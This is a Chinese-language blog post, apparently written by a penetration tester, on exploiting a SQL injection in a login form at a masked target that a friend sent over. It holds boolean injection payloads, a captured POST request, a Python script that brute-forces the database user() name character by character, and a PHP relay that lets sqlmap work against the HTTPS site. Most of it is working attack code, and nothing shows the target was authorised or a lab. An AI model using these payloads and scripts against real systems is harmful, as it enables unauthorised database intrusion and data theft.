今天一朋友丢过来一个注入让我看看
url:http://xxxx/
先看下页面
常规测试一下
用户名输入:' or 1=1 -- -
密码任意
返回
用户名输入:' or 1=2 -- -
返回
基本可以判断存在注入
http request:
POST /xxxx.php HTTP/1.1
Host: xxxx
Connection: keep-alive
Content-Length: 56
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=q7m1tvv7gi017o9t86uck332e6
email=%27+or+1%3Dif%281%3D1%2C1%2C2%29--+-&password=fdaf
email:
email=' or 1=if(1=1 *,1,2)-- -
本以为这样我们就可以拿到sqlmap跑
然后sqlmap报错了
[14:19:03] [CRITICAL] can't establish SSL connection
应该于https 证书有关,sqlmap貌似不能忽略证书,谷歌也没找到解决方法。
但是不死心
用py撸吧
import requests
import warnings
warnings.filterwarnings("ignore")
b = range(32,127)
d = range(1,20)
for l in d:
for a in b:
c="' or 1=if(1=1 and ascii(substr(user(),%s,1))=%s,1,2)-- -"% (l,a)
payload = {"email":c,"password":"aaa"}
r = requests.post("https://x.x.x.x/ad.php",payload,verify=False)
s = len(r.text.encode('GBK','ignore'))
#print s
if s!=2769:
print a
continue
这里注意
r = requests.post("https://x.x.x.x/ad.php",payload,verify=False)
verify=False 可以忽略证书
该脚本可以正常得出结果
但是不死心 sqlmap 这一神器跑步了 不甘心,所以想到了用中专的方法。
<?php
$url = "https://x.x.x.x/aaa.php";
$sql = $_GET[s];
$s = urlencode($sql);
$params = "email=$s&password=aa";
//echo $params;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)');
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_POST, 1); // post 提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
$output = curl_exec($ch);
curl_close($ch);
$a = strlen($output);
#echo $a;
if($a==2846){
echo "1";
}else{
echo "2";
}
这里注意一下,下面的两句忽略证书
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
然后抄起sqlmap就是干
收工。
请勿转载!